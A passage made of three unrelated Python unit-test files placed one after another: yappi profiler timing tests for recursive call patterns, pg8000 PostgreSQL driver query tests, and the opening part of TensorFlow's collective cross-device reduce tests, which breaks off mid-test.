self.assertEqual(cfsdd.ttot , 7)
self.assertEqual(cfsdd.tsub , 7)
self.assertEqual(cfsdd.ncall , 3)
self.assertEqual(cfsdd.nactualcall , 0)
def test_abcabc(self):
_timings = {"a_1":20,"b_1":19,"c_1":17, "a_2":13, "b_2":11, "c_2":9, "a_3":6}
_yappi._set_test_timings(_timings)
def a(n):
if n == 3:
return
else:
b(n)
def b(n):
c(n)
def c(n):
a(n+1)
stats = utils.run_and_get_func_stats(a, 1)
fsa = utils.find_stat_by_name(stats, 'a')
fsb = utils.find_stat_by_name(stats, 'b')
fsc = utils.find_stat_by_name(stats, 'c')
self.assertEqual(fsa.ncall , 3)
self.assertEqual(fsa.nactualcall , 1)
self.assertEqual(fsa.ttot , 20)
self.assertEqual(fsa.tsub , 9)
self.assertEqual(fsb.ttot , 19)
self.assertEqual(fsb.tsub , 4)
self.assertEqual(fsc.ttot , 17)
self.assertEqual(fsc.tsub , 7)
cfsab = fsa.children[fsb]
cfsbc = fsb.children[fsc]
cfsca = fsc.children[fsa]
self.assertEqual(cfsab.ttot , 19)
self.assertEqual(cfsab.tsub , 4)
self.assertEqual(cfsbc.ttot , 17)
self.assertEqual(cfsbc.tsub , 7)
self.assertEqual(cfsca.ttot , 13)
self.assertEqual(cfsca.tsub , 8)
def test_abcbca(self):
_timings = {"a_1":10,"b_1":9,"c_1":7,"b_2":4,"c_2":2,"a_2":1}
_yappi._set_test_timings(_timings)
self._ncall = 1
def a():
if self._ncall == 1:
b()
else:
return
def b():
c()
def c():
if self._ncall == 1:
self._ncall += 1
b()
else:
a()
stats = utils.run_and_get_func_stats(a)
fsa = utils.find_stat_by_name(stats, 'a')
fsb = utils.find_stat_by_name(stats, 'b')
fsc = utils.find_stat_by_name(stats, 'c')
cfsab = fsa.children[fsb]
cfsbc = fsb.children[fsc]
cfsca = fsc.children[fsa]
self.assertEqual(fsa.ttot , 10)
self.assertEqual(fsa.tsub , 2)
self.assertEqual(fsb.ttot , 9)
self.assertEqual(fsb.tsub , 4)
self.assertEqual(fsc.ttot , 7)
self.assertEqual(fsc.tsub , 4)
self.assertEqual(cfsab.ttot , 9)
self.assertEqual(cfsab.tsub , 2)
self.assertEqual(cfsbc.ttot , 7)
self.assertEqual(cfsbc.tsub , 4)
self.assertEqual(cfsca.ttot , 1)
self.assertEqual(cfsca.tsub , 1)
self.assertEqual(cfsca.ncall , 1)
self.assertEqual(cfsca.nactualcall , 0)
def test_aabccb(self):
_timings = {"a_1":13,"a_2":11,"b_1":9,"c_1":5,"c_2":3,"b_2":1}
_yappi._set_test_timings(_timings)
self._ncall = 1
def a():
if self._ncall == 1:
self._ncall += 1
a()
else:
b()
def b():
if self._ncall == 3:
return
else:
c()
def c():
if self._ncall == 2:
self._ncall += 1
c()
else:
b()
stats = utils.run_and_get_func_stats(a)
fsa = utils.find_stat_by_name(stats, 'a')
fsb = utils.find_stat_by_name(stats, 'b')
fsc = utils.find_stat_by_name(stats, 'c')
cfsaa = fsa.children[fsa.index]
cfsab = fsa.children[fsb]
cfsbc = fsb.children[fsc.full_name]
cfscc = fsc.children[fsc]
cfscb = fsc.children[fsb]
self.assertEqual(fsb.ttot , 9)
self.assertEqual(fsb.tsub , 5)
self.assertEqual(cfsbc.ttot , 5)
self.assertEqual(cfsbc.tsub , 2)
self.assertEqual(fsa.ttot , 13)
self.assertEqual(fsa.tsub , 4)
self.assertEqual(cfsab.ttot , 9)
self.assertEqual(cfsab.tsub , 4)
self.assertEqual(cfsaa.ttot , 11)
self.assertEqual(cfsaa.tsub , 2)
self.assertEqual(fsc.ttot , 5)
self.assertEqual(fsc.tsub , 4)
def test_abaa(self):
_timings = {"a_1":13,"b_1":10,"a_2":9,"a_3":5}
_yappi._set_test_timings(_timings)
self._ncall = 1
def a():
if self._ncall == 1:
b()
elif self._ncall == 2:
self._ncall += 1
a()
else:
return
def b():
self._ncall += 1
a()
stats = utils.run_and_get_func_stats(a)
fsa = utils.find_stat_by_name(stats, 'a')
fsb = utils.find_stat_by_name(stats, 'b')
cfsaa = fsa.children[fsa]
cfsba = fsb.children[fsa]
self.assertEqual(fsb.ttot , 10)
self.assertEqual(fsb.tsub , 1)
self.assertEqual(fsa.ttot , 13)
self.assertEqual(fsa.tsub , 12)
self.assertEqual(cfsaa.ttot , 5)
self.assertEqual(cfsaa.tsub , 5)
self.assertEqual(cfsba.ttot , 9)
self.assertEqual(cfsba.tsub , 4)
def test_aabb(self):
_timings = {"a_1":13,"a_2":10,"b_1":9,"b_2":5}
_yappi._set_test_timings(_timings)
self._ncall = 1
def a():
if self._ncall == 1:
self._ncall += 1
a()
elif self._ncall == 2:
b()
else:
return
def b():
if self._ncall == 2:
self._ncall += 1
b()
else:
return
stats = utils.run_and_get_func_stats(a)
fsa = utils.find_stat_by_name(stats, 'a')
fsb = utils.find_stat_by_name(stats, 'b')
cfsaa = fsa.children[fsa]
cfsab = fsa.children[fsb]
cfsbb = fsb.children[fsb]
self.assertEqual(fsa.ttot , 13)
self.assertEqual(fsa.tsub , 4)
self.assertEqual(fsb.ttot , 9)
self.assertEqual(fsb.tsub , 9)
self.assertEqual(cfsaa.ttot , 10)
self.assertEqual(cfsaa.tsub , 1)
self.assertEqual(cfsab.ttot , 9)
self.assertEqual(cfsab.tsub , 4)
self.assertEqual(cfsbb.ttot , 5)
self.assertEqual(cfsbb.tsub , 5)
def test_abbb(self):
_timings = {"a_1":13,"b_1":10,"b_2":6,"b_3":1}
_yappi._set_test_timings(_timings)
self._ncall = 1
def a():
if self._ncall == 1:
b()
def b():
if self._ncall == 3:
return
self._ncall += 1
b()
stats = utils.run_and_get_func_stats(a)
fsa = utils.find_stat_by_name(stats, 'a')
fsb = utils.find_stat_by_name(stats, 'b')
cfsab = fsa.children[fsb]
cfsbb = fsb.children[fsb]
self.assertEqual(fsa.ttot , 13)
self.assertEqual(fsa.tsub , 3)
self.assertEqual(fsb.ttot , 10)
self.assertEqual(fsb.tsub , 10)
self.assertEqual(fsb.ncall , 3)
self.assertEqual(fsb.nactualcall , 1)
self.assertEqual(cfsab.ttot , 10)
self.assertEqual(cfsab.tsub , 4)
self.assertEqual(cfsbb.ttot , 6)
self.assertEqual(cfsbb.tsub , 6)
self.assertEqual(cfsbb.nactualcall , 0)
self.assertEqual(cfsbb.ncall , 2)
def test_aaab(self):
_timings = {"a_1":13,"a_2":10,"a_3":6,"b_1":1}
_yappi._set_test_timings(_timings)
self._ncall = 1
def a():
if self._ncall == 3:
b()
return
self._ncall += 1
a()
def b():
return
stats = utils.run_and_get_func_stats(a)
fsa = utils.find_stat_by_name(stats, 'a')
fsb = utils.find_stat_by_name(stats, 'b')
cfsaa = fsa.children[fsa]
cfsab = fsa.children[fsb]
self.assertEqual(fsa.ttot , 13)
self.assertEqual(fsa.tsub , 12)
self.assertEqual(fsb.ttot , 1)
self.assertEqual(fsb.tsub , 1)
self.assertEqual(cfsaa.ttot , 10)
self.assertEqual(cfsaa.tsub , 9)
self.assertEqual(cfsab.ttot , 1)
self.assertEqual(cfsab.tsub , 1)
def test_abab(self):
_timings = {"a_1":13,"b_1":10,"a_2":6,"b_2":1}
_yappi._set_test_timings(_timings)
self._ncall = 1
def a():
b()
def b():
if self._ncall == 2:
return
self._ncall += 1
a()
stats = utils.run_and_get_func_stats(a)
fsa = utils.find_stat_by_name(stats, 'a')
fsb = utils.find_stat_by_name(stats, 'b')
cfsab = fsa.children[fsb]
cfsba = fsb.children[fsa]
self.assertEqual(fsa.ttot , 13)
self.assertEqual(fsa.tsub , 8)
self.assertEqual(fsb.ttot , 10)
self.assertEqual(fsb.tsub , 5)
self.assertEqual(cfsab.ttot , 10)
self.assertEqual(cfsab.tsub , 5)
self.assertEqual(cfsab.ncall , 2)
self.assertEqual(cfsab.nactualcall , 1)
self.assertEqual(cfsba.ttot , 6)
self.assertEqual(cfsba.tsub , 5)
|
test_query.py
|
import unittest
import threading
import pg8000
from .connection_settings import db_connect
from six import u
from sys import exc_info
import datetime
from distutils.version import LooseVersion
from warnings import filterwarnings
# Tests relating to the basic operation of the database driver, driven by the
# pg8000 custom interface.
class Tests(unittest.TestCase):
def setUp(self):
self.db = pg8000.connect(**db_connect)
filterwarnings("ignore", "DB-API extension cursor.next()")
filterwarnings("ignore", "DB-API extension cursor.__iter__()")
self.db.paramstyle = 'format'
try:
cursor = self.db.cursor()
try:
cursor.execute("DROP TABLE t1")
except pg8000.DatabaseError:
e = exc_info()[1]
# the only acceptable error is:
self.assertEqual(e.args[1], '42P01') # table does not exist
self.db.rollback()
cursor.execute(
"CREATE TEMPORARY TABLE t1 (f1 int primary key, "
"f2 bigint not null, f3 varchar(50) null)")
finally:
cursor.close()
self.db.commit()
def tearDown(self):
self.db.close()
def testDatabaseError(self):
try:
cursor = self.db.cursor()
self.assertRaises(
pg8000.ProgrammingError, cursor.execute,
"INSERT INTO t99 VALUES (1, 2, 3)")
finally:
cursor.close()
self.db.rollback()
def testParallelQueries(self):
try:
cursor = self.db.cursor()
cursor.execute(
"INSERT INTO t1 (f1, f2, f3) VALUES (%s, %s, %s)",
(1, 1, None))
cursor.execute(
"INSERT INTO t1 (f1, f2, f3) VALUES (%s, %s, %s)",
(2, 10, None))
cursor.execute(
"INSERT INTO t1 (f1, f2, f3) VALUES (%s, %s, %s)",
(3, 100, None))
cursor.execute(
"INSERT INTO t1 (f1, f2, f3) VALUES (%s, %s, %s)",
(4, 1000, None))
cursor.execute(
"INSERT INTO t1 (f1, f2, f3) VALUES (%s, %s, %s)",
(5, 10000, None))
try:
c1 = self.db.cursor()
c2 = self.db.cursor()
c1.execute("SELECT f1, f2, f3 FROM t1")
for row in c1:
f1, f2, f3 = row
c2.execute(
"SELECT f1, f2, f3 FROM t1 WHERE f1 > %s", (f1,))
for row in c2:
f1, f2, f3 = row
finally:
c1.close()
c2.close()
finally:
cursor.close()
self.db.rollback()
def testParallelOpenPortals(self):
try:
c1, c2 = self.db.cursor(), self.db.cursor()
c1count, c2count = 0, 0
q = "select * from generate_series(1, %s)"
params = (self.db._row_cache_size + 1,)
c1.execute(q, params)
c2.execute(q, params)
for c2row in c2:
c2count += 1
for c1row in c1:
c1count += 1
finally:
c1.close()
c2.close()
self.db.rollback()
self.assertEqual(c1count, c2count)
# Test query works if the number of rows returned is exactly the same as
# the size of the row cache
def testQuerySizeCache(self):
try:
cursor = self.db.cursor()
cursor.execute(
"select * from generate_series(1, %s)",
(self.db._row_cache_size,))
for row in cursor:
pass
finally:
cursor.close()
self.db.rollback()
# Run a query on a table, alter the structure of the table, then run the
# original query again.
def testAlter(self):
try:
cursor = self.db.cursor()
cursor.execute("select * from t1")
cursor.execute("alter table t1 drop column f3")
cursor.execute("select * from t1")
finally:
cursor.close()
self.db.rollback()
# Run a query on a table, drop then re-create the table, then run the
# original query again.
def testCreate(self):
try:
cursor = self.db.cursor()
cursor.execute("select * from t1")
cursor.execute("drop table t1")
cursor.execute("create temporary table t1 (f1 int primary key)")
cursor.execute("select * from t1")
finally:
cursor.close()
self.db.rollback()
def testInsertReturning(self):
try:
cursor = self.db.cursor()
cursor.execute("CREATE TABLE t2 (id serial, data text)")
# Test INSERT ... RETURNING with one row...
cursor.execute(
"INSERT INTO t2 (data) VALUES (%s) RETURNING id",
("test1",))
row_id = cursor.fetchone()[0]
cursor.execute("SELECT data FROM t2 WHERE id = %s", (row_id,))
self.assertEqual("test1", cursor.fetchone()[0])
# Before PostgreSQL 9 we don't know the row count for a select
if self.db._server_version > LooseVersion('8.0.0'):
self.assertEqual(cursor.rowcount, 1)
# Test with multiple rows...
cursor.execute(
"INSERT INTO t2 (data) VALUES (%s), (%s), (%s) "
"RETURNING id", ("test2", "test3", "test4"))
self.assertEqual(cursor.rowcount, 3)
ids = tuple([x[0] for x in cursor])
self.assertEqual(len(ids), 3)
finally:
cursor.close()
self.db.rollback()
def testMultithreadedCursor(self):
try:
cursor = self.db.cursor()
# Note: Multithreading with a cursor is not highly recommended due
# to low performance.
def test(left, right):
for i in range(left, right):
cursor.execute(
"INSERT INTO t1 (f1, f2, f3) VALUES (%s, %s, %s)",
(i, id(threading.currentThread()), None))
t1 = threading.Thread(target=test, args=(1, 25))
t2 = threading.Thread(target=test, args=(25, 50))
t3 = threading.Thread(target=test, args=(50, 75))
t1.start()
t2.start()
t3.start()
t1.join()
t2.join()
t3.join()
finally:
cursor.close()
self.db.rollback()
def testRowCount(self):
# Before PostgreSQL 9 we don't know the row count for a select
if self.db._server_version > LooseVersion('8.0.0'):
try:
cursor = self.db.cursor()
expected_count = 57
cursor.executemany(
"INSERT INTO t1 (f1, f2, f3) VALUES (%s, %s, %s)",
tuple((i, i, None) for i in range(expected_count)))
# Check rowcount after executemany
self.assertEqual(expected_count, cursor.rowcount)
self.db.commit()
cursor.execute("SELECT * FROM t1")
# Check row_count without doing any reading first...
self.assertEqual(expected_count, cursor.rowcount)
# Check rowcount after reading some rows, make sure it still
# works...
for i in range(expected_count // 2):
cursor.fetchone()
self.assertEqual(expected_count, cursor.rowcount)
finally:
cursor.close()
self.db.commit()
try:
cursor = self.db.cursor()
# Restart the cursor, read a few rows, and then check rowcount
# again...
cursor = self.db.cursor()
cursor.execute("SELECT * FROM t1")
for i in range(expected_count // 3):
cursor.fetchone()
self.assertEqual(expected_count, cursor.rowcount)
self.db.rollback()
# Should be -1 for a command with no results
cursor.execute("DROP TABLE t1")
self.assertEqual(-1, cursor.rowcount)
finally:
cursor.close()
self.db.commit()
def testRowCountUpdate(self):
try:
cursor = self.db.cursor()
cursor.execute(
"INSERT INTO t1 (f1, f2, f3) VALUES (%s, %s, %s)",
(1, 1, None))
cursor.execute(
"INSERT INTO t1 (f1, f2, f3) VALUES (%s, %s, %s)",
(2, 10, None))
cursor.execute(
"INSERT INTO t1 (f1, f2, f3) VALUES (%s, %s, %s)",
(3, 100, None))
cursor.execute(
"INSERT INTO t1 (f1, f2, f3) VALUES (%s, %s, %s)",
(4, 1000, None))
cursor.execute(
"INSERT INTO t1 (f1, f2, f3) VALUES (%s, %s, %s)",
(5, 10000, None))
cursor.execute("UPDATE t1 SET f3 = %s WHERE f2 > 101", ("Hello!",))
self.assertEqual(cursor.rowcount, 2)
finally:
cursor.close()
self.db.commit()
def testIntOid(self):
try:
cursor = self.db.cursor()
# https://bugs.launchpad.net/pg8000/+bug/230796
cursor.execute(
"SELECT typname FROM pg_type WHERE oid = %s", (100,))
finally:
cursor.close()
self.db.rollback()
def testUnicodeQuery(self):
try:
cursor = self.db.cursor()
cursor.execute(
u(
"CREATE TEMPORARY TABLE \u043c\u0435\u0441\u0442\u043e "
"(\u0438\u043c\u044f VARCHAR(50), "
"\u0430\u0434\u0440\u0435\u0441 VARCHAR(250))"))
finally:
cursor.close()
self.db.commit()
def testExecutemany(self):
try:
cursor = self.db.cursor()
cursor.executemany(
"INSERT INTO t1 (f1, f2, f3) VALUES (%s, %s, %s)",
((1, 1, 'Avast ye!'), (2, 1, None)))
cursor.executemany(
"select %s",
(
(datetime.datetime(2014, 5, 7, tzinfo=pg8000.core.utc), ),
(datetime.datetime(2014, 5, 7),)))
finally:
cursor.close()
self.db.commit()
# Check that autocommit stays off
# We keep track of whether we're in a transaction or not by using the
# READY_FOR_QUERY message.
def testTransactions(self):
try:
cursor = self.db.cursor()
cursor.execute("commit")
cursor.execute(
"INSERT INTO t1 (f1, f2, f3) VALUES (%s, %s, %s)",
(1, 1, "Zombie"))
cursor.execute("rollback")
cursor.execute("select * from t1")
# Before PostgreSQL 9 we don't know the row count for a select
if self.db._server_version > LooseVersion('8.0.0'):
self.assertEqual(cursor.rowcount, 0)
finally:
cursor.close()
self.db.commit()
def testIn(self):
try:
cursor = self.db.cursor()
cursor.execute(
"SELECT typname FROM pg_type WHERE oid = any(%s)", ([16, 23],))
ret = cursor.fetchall()
self.assertEqual(ret[0][0], 'bool')
finally:
cursor.close()
def test_no_previous_tpc(self):
try:
self.db.tpc_begin('Stacey')
cursor = self.db.cursor()
cursor.execute("SELECT * FROM pg_type")
self.db.tpc_commit()
finally:
cursor.close()
# Check that tpc_recover() doesn't start a transaction
def test_tpc_recover(self):
try:
self.db.tpc_recover()
cursor = self.db.cursor()
self.db.autocommit = True
# If tpc_recover() has started a transaction, this will fail
cursor.execute("VACUUM")
finally:
cursor.close()
# An empty query should raise a ProgrammingError
def test_empty_query(self):
try:
cursor = self.db.cursor()
self.assertRaises(pg8000.ProgrammingError, cursor.execute, "")
finally:
cursor.close()
# rolling back when not in a transaction doesn't generate a warning
def test_rollback_no_transaction(self):
try:
cursor = self.db.cursor()
notices = []
self.db.NoticeReceived += notices.append
# First, verify that a raw rollback does produce a notice
self.db.execute(cursor, "rollback", None)
self.assertEqual(1, len(notices))
            # 25P01 is the code for no_active_sql_transaction. It has
# a message and severity name, but those might be
# localized/depend on the server version.
self.assertEqual(notices[0].get(b'C'), b'25P01')
notices.pop()
# Now going through the rollback method doesn't produce
# any notices because it knows we're not in a transaction.
self.db.rollback()
self.assertEqual(0, len(notices))
finally:
cursor.close()
def test_context_manager_class(self):
self.assertTrue('__enter__' in pg8000.core.Cursor.__dict__)
self.assertTrue('__exit__' in pg8000.core.Cursor.__dict__)
with self.db.cursor() as cursor:
cursor.execute('select 1')
if __name__ == "__main__":
unittest.main()
|
cross_device_ops_test.py
|
# Copyright 2018 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for CrossDeviceOps."""
import collections
import os
import threading
import time
from absl.testing import parameterized
from tensorflow.core.protobuf import config_pb2
from tensorflow.core.protobuf import tensorflow_server_pb2
from tensorflow.python.distribute import cluster_resolver as cluster_resolver_lib
from tensorflow.python.distribute import collective_util
from tensorflow.python.distribute import combinations
from tensorflow.python.distribute import cross_device_ops as cross_device_ops_lib
from tensorflow.python.distribute import cross_device_utils
from tensorflow.python.distribute import device_util
from tensorflow.python.distribute import multi_process_runner
from tensorflow.python.distribute import multi_worker_test_base
from tensorflow.python.distribute import reduce_util
from tensorflow.python.distribute import test_util
from tensorflow.python.distribute import values as value_lib
from tensorflow.python.eager import context
from tensorflow.python.eager import def_function
from tensorflow.python.eager import test
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import errors
from tensorflow.python.framework import indexed_slices
from tensorflow.python.framework import ops
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import collective_ops
from tensorflow.python.ops import control_flow_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.util import nest
CollectiveReplicaLauncher = cross_device_utils.CollectiveReplicaLauncher
CommunicationImplementation = collective_util.CommunicationImplementation
ReduceOp = reduce_util.ReduceOp
IndexedSlicesValue = indexed_slices.IndexedSlicesValue
IndexedSlices = indexed_slices.IndexedSlices
def make_per_replica_value(value, devices):
"""Creates a `PerReplica` object whose values reside in `devices`.
Args:
value: a tensor-convertible value or a `IndexedSlicesValue`, or a callable
that takes one argument (`device_idx`) and should return the value that is
going to be created on devices[device_idx].
devices: a list of device strings to create `PerReplica` values on.
Returns:
A `PerReplica` object.
"""
values = []
for device_idx, device in enumerate(devices):
if callable(value):
v = value(device_idx)
elif isinstance(value, list):
v = value[device_idx]
else:
v = value
if isinstance(v, IndexedSlicesValue):
with ops.device(device):
values.append(
IndexedSlices(
values=array_ops.identity(v.values),
indices=array_ops.identity(v.indices),
dense_shape=array_ops.identity(v.dense_shape)))
else:
with ops.device(device):
values.append(array_ops.identity(v))
return value_lib.PerReplica(values)
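# Example sketch (the device string and value are illustrative): build a
# one-element `PerReplica` from a callable that receives the device index.
#   devices = ["/job:worker/replica:0/task:0/device:CPU:0"]
#   per_replica = make_per_replica_value(
#       lambda device_idx: constant_op.constant(1.0), devices)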
def enable_collective_ops():
"""Enable collectives in the current process."""
cluster_resolver = cluster_resolver_lib.TFConfigClusterResolver()
context.context().configure_collective_ops(
collective_leader="'/job:worker/replica:0/task:0'")
config_proto = config_pb2.ConfigProto()
config_proto.experimental.collective_group_leader = (
"/job:worker/replica:0/task:0")
server_def = tensorflow_server_pb2.ServerDef(
cluster=cluster_resolver.cluster_spec().as_cluster_def(),
default_session_config=config_proto,
job_name=cluster_resolver.task_type,
task_index=cluster_resolver.task_id,
protocol=cluster_resolver.rpc_layer)
context.context().enable_collective_ops(server_def)
# Recover default flag values.
CollectiveReplicaLauncher._prefer_unique_instance_key = True
CollectiveReplicaLauncher._prefer_ordering_token = False
class MultiProcessPoolRunner():
def __init__(self, num_processes):
cluster_spec_dict = multi_worker_test_base.create_cluster_spec(
num_workers=num_processes)
self.runner = multi_process_runner.MultiProcessPoolRunner(cluster_spec_dict)
# Global MultiProcessPoolRunners that can be shared by test cases to avoid
# expensive initialization cost of TensorFlow in new processes.
#
# Note that they have to be globals and can't be owned by test classes because
# fn usually captures the test class instance, and a test class
# instance can't be pickled if it has mpr as a member (it is not allowed to
# pickle Process objects).
# TODO(crccw): Use `num_workers` combination once it is ready.
global_mpr_2p = MultiProcessPoolRunner(num_processes=2)
global_mpr_1p = MultiProcessPoolRunner(num_processes=1)
def get_global_mpr(num_processes):
if num_processes == 1:
return global_mpr_1p.runner
elif num_processes == 2:
return global_mpr_2p.runner
else:
raise ValueError("get_global_mpr: num_processes must be 1 or 2, got %d" %
num_processes)
class CollectiveOpsTest(test.TestCase, parameterized.TestCase):
def setUp(self):
super().setUp()
# Enabling collectives can be done in "setUpClass", but requires using
# different collective_keys in different tests as collectives are reused
# across tests. Always resetting collective ops before each test offers
# better test isolation.
global_mpr_1p.runner.run(enable_collective_ops)
global_mpr_2p.runner.run(enable_collective_ops)
def make_collective(self, num_processes, gpu_per_process):
"""Returns collectives and other info to be used in tests.
Args:
num_processes: an integer indicating the number of processes that
participate in the collective.
gpu_per_process: number of GPUs (0 if no GPUs) used by each process.
Returns:
      A tuple of (collective, devices, pid) where collective is an instance
of `CollectiveAllReduce`, devices are a list of local devices (str)
attached to the current process, and pid is the id of this process among
all participant processes.
"""
cluster_resolver = cluster_resolver_lib.TFConfigClusterResolver()
devices = [
"/job:worker/replica:0/task:%d/device:CPU:0" % cluster_resolver.task_id
]
if gpu_per_process > 0:
devices = [
"/job:worker/replica:0/task:%d/device:GPU:%d" %
(cluster_resolver.task_id, i) for i in range(gpu_per_process)
]
group_size = num_processes * len(devices)
collective = cross_device_ops_lib.CollectiveAllReduce(
devices=devices,
group_size=group_size,
options=collective_util.Options())
return collective, devices, cluster_resolver.task_id
def as_list(self, value):
"""An utility to convert a `Mirrored`, `Tensor` or `IndexedSlices` to a list.
The reason it exists is to provide a uniformed view of returned value of
"reduce" calls, especially across tf.function boundaries. Returning
`Mirrored` from a tf.function will only evaluate the primary value, which
makes collective ops of non-primary device being pruned, and will eventually
cause hanging.
Args:
value: the value to convert, can be one of `Mirrored`, `Tensor` and
`IndexedSlices`.
Returns:
A list of `Tensor` or `IndexedSlices`.
"""
if isinstance(value, ops.Tensor):
return [value]
elif isinstance(value, IndexedSlices):
return [value]
elif isinstance(value, value_lib.Mirrored):
return value.values
else:
raise ValueError("unwrap: unsupported input type: %s" % type(value))
RunOptions = collections.namedtuple( # pylint: disable=invalid-name
"RunOptions",
[
"mode", # A list of str from ["eager", "func_graph"]
"num_processes",
"gpus_per_process",
"reduce_op",
"communication_options",
"prefer_unique_instance_key",
])
RunOptions.__new__.__defaults__ = (["eager",
"func_graph"], 2, 0, ReduceOp.SUM,
collective_util.Options(), True)
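  # Example sketch: construct RunOptions overriding only the fields under test;
  # the remaining fields fall back to the defaults declared above.
  #   opts = RunOptions(num_processes=2, gpus_per_process=0,
  #                     reduce_op=ReduceOp.MEAN,
  #                     prefer_unique_instance_key=False)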
def reduce_and_verify(self, inputs, expect, options):
"""Reduce the given `inputs` and verify the output matches `expect`.
Args:
inputs: a list of `Tensor` or `IndexedSlices`, where i-th value will be
fed to i-th replica.
expect: a `Tensor` or `IndexedSlices`. This should be the expected value
for one replica.
      options: a `RunOptions` instance.
"""
def replica_fn():
CollectiveReplicaLauncher._prefer_unique_instance_key = (
options.prefer_unique_instance_key)
collective, devices, pid = self.make_collective(options.num_processes,
options.gpus_per_process)
def reduce_fn():
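        # Feed each local device its slice of `inputs` and reduce across all
        # replicas in the group.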
value_fn = lambda device_idx: inputs[pid * len(devices) + device_idx]
per_replica_value = make_per_replica_value(value_fn, devices)
reduced_values = collective.reduce(options.reduce_op, per_replica_value,
per_replica_value,
options.communication_options)
if options.gpus_per_process > 1:
self.assertIsInstance(reduced_values, value_lib.Mirrored)
reduced_values = self.as_list(reduced_values)
self.assertAllEqual(devices, [v.device for v in reduced_values])
return [ops.convert_to_tensor(v) for v in reduced_values]
per_replica_expect = [ops.convert_to_tensor(expect)] * len(devices)
if "eager" in options.mode:
got = reduce_fn()
self.assertAllClose(got, per_replica_expect)
if "func_graph" in options.mode:
got = def_function.function(reduce_fn)()
self.assertAllClose(got, per_replica_expect)
get_global_mpr(options.num_processes).run(replica_fn)
def batch_reduce_and_verify(self, inputs, expect, options):
"""Batch reduce the given `inputs` and verify the output matches `expect`.
Args:
inputs: a 2-level nested list of `Tensor` or `IndexedSlices`, where i-th
value will be fed to i-th replica.
expect: a list of `Tensor` or `IndexedSlices`. This should be the expected
value for one replica.
      options: a `RunOptions` instance.
"""
def replica_fn():
CollectiveReplicaLauncher._prefer_unique_instance_key = (
options.prefer_unique_instance_key)
collective, devices, pid = self.make_collective(options.num_processes,
options.gpus_per_process)
def batch_reduce_fn():
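        # Build one PerReplica value per batch element and reduce them all in a
        # single batch_reduce call.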
batch_size = len(inputs[0])
value_dst_pairs = []
for i in range(batch_size):
def value_fn(device_idx, idx=i):
return inputs[pid * len(devices) + device_idx][idx]
per_replica_value = make_per_replica_value(value_fn, devices)
value_dst_pairs.append((per_replica_value, per_replica_value))
reduced_values = collective.batch_reduce(options.reduce_op,
value_dst_pairs,
options.communication_options)
if options.gpus_per_process > 1:
for v in reduced_values:
self.assertIsInstance(v, value_lib.Mirrored)
reduced_values = [self.as_list(v) for v in reduced_values]
for v in reduced_values:
self.assertAllEqual(devices, [t.device for t in v])
return nest.map_structure(ops.convert_to_tensor, reduced_values)
per_replica_expect = nest.map_structure(
lambda x: [ops.convert_to_tensor(x)] * len(devices), expect)
if "eager" in options.mode:
got = batch_reduce_fn()
self.assertAllClose(got, per_replica_expect)
if "func_graph" in options.mode:
got = def_function.function(batch_reduce_fn)()
self.assertAllClose(got, per_replica_expect)
get_global_mpr(options.num_processes).run(replica_fn)
@combinations.generate(
combinations.combine(
num_processes=[1, 2],
required_gpus=[0, 1, 2],
implementation=[
CommunicationImplementation.AUTO,
CommunicationImplementation.RING,
CommunicationImplementation.NCCL,
],
reduce_op=[ReduceOp.SUM, ReduceOp.MEAN],
prefer_unique_instance_key=[True, False]))
def testReduceDense(self, num_processes, required_gpus, implementation,
reduce_op, prefer_unique_instance_key):
if (required_gpus == 0 and
implementation == CommunicationImplementation.NCCL):
self.skipTest("Skip CPU + NCCL combination")
if (num_processes != required_gpus and
implementation == CommunicationImplementation.NCCL):
self.skipTest("Skip NCCL combination with mismatched process and GPU "
"count. NCCL requires physical GPUs for every process.")
if (num_processes != required_gpus and
implementation == CommunicationImplementation.AUTO):
self.skipTest("Skip potential NCCL combination (AUTO) with mismatched "
"process and GPU count. NCCL requires physical GPUs for "
"every process.")
options = self.RunOptions(
num_processes=num_processes,
gpus_per_process=required_gpus,
reduce_op=reduce_op,
communication_options=collective_util.Options(
implementation=implementation),
prefer_unique_instance_key=prefer_unique_instance_key)
group_size = options.num_processes * (options.gpus_per_process or 1)
inputs_data = [1.0, 2.0, 3.0, 4.0]
inputs = inputs_data[0:group_size]
if group_size == 1:
expect = 1.0
    elif group_size == 2:
expect = 3.0 if reduce_op == ReduceOp.SUM else 1.5
elif group_size == 4:
expect = 10.0 if reduce_op == ReduceOp.SUM else 2.5
self.reduce_and_verify(inputs, expect, options)
@combinations.generate(
combinations.combine(
num_processes=[1, 2],
required_gpus=[0, 1, 2],
implementation=[
CommunicationImplementation.AUTO,
CommunicationImplementation.RING,
CommunicationImplementation.NCCL,
],
# TODO(b/166682130): add MEAN reduce once the bug is fixed.
reduce_op=ReduceOp.SUM,
prefer_unique_instance_key=[True, False]))
def testReduceSparse(self, num_processes, required_gpus, implementation,
reduce_op, prefer_unique_instance_key):
if (required_gpus == 0 and
implementation == CommunicationImplementation.NCCL):
self.skipTest("Skip CPU + NCCL combination")
if (num_processes != required_gpus and
implementation == CommunicationImplementation.NCCL):
self.skipTest("Skip NCCL combination with mismatched process and GPU "
"count. NCCL requires physical GPUs for every process.")
if (num_processes != required_gpus and
implementation == CommunicationImplementation.AUTO):
self.skipTest("Skip potential NCCL combination (AUTO) with mismatched "
"process and GPU count. NCCL requires physical GPUs for "
"every process.")
options = self.RunOptions(
mode=["func_graph"], # Sparse reduce is not supported in eager.
num_processes=num_processes,
gpus_per_process=required_gpus,
reduce_op=reduce_op,
communication_options=collective_util.Options(
implementation=implementation),
prefer_unique_instance_key=prefer_unique_instance_key)
group_size = options.num_processes * (options.gpus_per_process or 1)
inputs_data = [
IndexedSlicesValue(
values=[[1.], [2.]], indices=[0, 1], dense_shape=[10, 1]),
IndexedSlicesValue(
values=[[3.], [4.]], indices=[1, 2], dense_shape=[10, 1]),
IndexedSlicesValue(
values=[[5.], [6.]], indices=[7, 8], dense_shape=[10, 1]),
IndexedSlicesValue(
